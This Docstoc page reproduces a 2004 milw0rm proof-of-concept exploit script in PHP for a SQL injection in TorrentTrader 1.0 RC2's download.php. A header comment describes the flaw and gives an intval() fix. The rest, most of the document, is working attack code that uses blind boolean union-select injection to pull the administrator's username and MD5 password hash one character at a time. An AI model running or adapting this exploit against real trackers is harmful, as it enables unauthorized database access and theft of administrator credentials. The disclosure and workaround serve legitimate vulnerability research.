Docstoc

TorrentTrader 1.0 RC2 SQL Injection Exploit

Document Sample
TorrentTrader 1.0 RC2 SQL Injection Exploit Powered By Docstoc
					                                TorrentTrader 1.0 RC2 SQL Injection Exploit          Page 1/3
  1    #!/usr/bin/php
  2
  3
  4    <?
  5
  6
  7    /*
  8
  9
  10   TorrentTrader 1.0 RC2 SQL Injection Proof of Concept
  11   By aCiDBiTS acidbits_at_hotmail.com 31−August−2004
  12
  13
  14   "TorrentTrader (http://www.torrenttrader.com/) is a feature packed and
  15   highly customisable open−source BitTorrent tracker."
  16
  17
  18   This PoC dumps the username and password’s md5 hash of first user in
  19   TorrentTrader web application database, that should be the administrator.
  20   First it fetchs a valid torrent id, then it determines if database’s user
  21   can perform "union select" and finally obtains the username and
  22   md5(password). Tested on TorrentTrader 1.0 RC2, maybe older versions also
  23   vulnerable.
  24
  25
  26   Usage (in my debian box):
  27   php4 −q ./tt_sqli_poc.php "http://127.0.0.1/torrenttrade"
  28
  29
  30
  31   ++ Vulnerability description & workaround++
  32
  33
  34   There is no user input sanization for parameter "id" in download.php prior
  35   beeing used in a SQL query. This can be exploited to manipulate SQL queries
  36   by injecting arbitrary SQL code. A workaround to solve this is to modify
  37   download.php, line13:
  38
  39
  40   $res = mysql_query("SELECT filename FROM torrents WHERE id = $id");
  41
  42
  43   With:
  44
  45
  46   $res = mysql_query("SELECT filename FROM torrents WHERE id =
  47   ".intval($id));
  48
  49
  50
  51   */
  52

aCiDBiTS                                                                             09/01/2004
                                 TorrentTrader 1.0 RC2 SQL Injection Exploit         Page 2/3
  53
  54
  55    echo "+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+\n|
  56    TorrentTrader 1.0 RC2 SQL Injection Proof of Concept |\n| By aCiDBiTS
  57    acidbits_at_hotmail.com 31−August−2004
  58    |\n+−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−+\n\n";
  59
  60
  61
  62    if($argc<2) die("Usage: ".$argv[0]." URL_to_TorrentTrader_script\n\n");
  63    $host=$argv[1];
  64    if(substr($host,strlen($host)−1,1)!=’/’) $host.=’/’;
  65
  66
  67    echo "[+] Getting valid torrent id ... ";
  68    $webc=get_web($host);
  69    $temp=explode("torrents−details.php?id=",$webc);
  70    $id=intval($temp[1]);
  71    if( !$id ) die( "Failed!\n\n");
  72    echo "OK\n Using Torrent id: $id\n\n";
  73
  74
  75    echo "[+] Checking if injection is possible ... ";
  76    $bas=$id."%20and%200%20union%20select%201%20from%20users%20where%20";
  77    if( test_cond( $bas."1" ) && !test_cond( $bas."0" ) ) echo " OK\n\n"; else
  78    die ("\n\n Failed! \n\n");
  79
  80
  81    echo "[+] Getting username & password ... \n Username: ";
  82    get_field( "username");
  83    echo "\n MD5(Password): ";
  84    get_field( "password" );
  85
  86
  87    die("\n\n \ / \ /\n (Oo) Done! (oO)\n //||\\\\
  88    //||\\\\\n\n");
  89
  90
  91
  92    function test_cond( $cond )
  93    {
  94    global $host;
  95    $res=get_web( $host."download.php?id=".$cond);
  96    if( eregi( "The ID has been found on the Database, but the torrent has
  97    gone!", $res ) )
  98    return 1;
  99    else return 0;
  100   }
  101
  102
  103
  104   function get_field( $field )
aCiDBiTS                                                                             09/01/2004
                                 TorrentTrader 1.0 RC2 SQL Injection Exploit                       Page 3/3
  105   {
  106   global $bas;
  107   $unval= " 0123456789ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
  108   $idx=1;
  109   $min=0;
  110   $max=strlen($unval);
  111   while($min!=$max) {
  112   $mid=$min+(($max−$min)/2);
  113   if(
  114   test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))=".ord(substr($unval,$mid,1)))
  115   ) {
  116   $idx++;
  117   echo substr($unval,$mid,1);
  118   $min=0;
  119   $max=strlen($unval);
  120   if( !test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))") )
  121   return;
  122   } else {
  123   if(
  124   test_cond($bas."id=1%20and%20ord(substring($field,$idx,1))<".ord(substr($unval,$mid,1)))
  125   ) $max=$mid;
  126   else $min=$mid;
  127   }
  128   }
  129   die( "\n\nUnexpected error!\n\n");
  130   }
  131
  132
  133
  134   function get_web($url)
  135   {
  136   $ch=curl_init();
  137   curl_setopt ($ch, CURLOPT_URL, $url);
  138   curl_setopt ($ch, CURLOPT_HEADER, 0);
  139   curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
  140   $data=curl_exec ($ch);
  141   curl_close ($ch);
  142   return $data;
  143   }
  144
  145
  146
  147   /* \ /
  148   (Oo)
  149   //||\\ */
  150
  151
  152   ?>
  153
  154   # milw0rm.com [2004−09−01]


aCiDBiTS                                                                                           09/01/2004

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:35
posted:5/24/2010
language:English
pages:3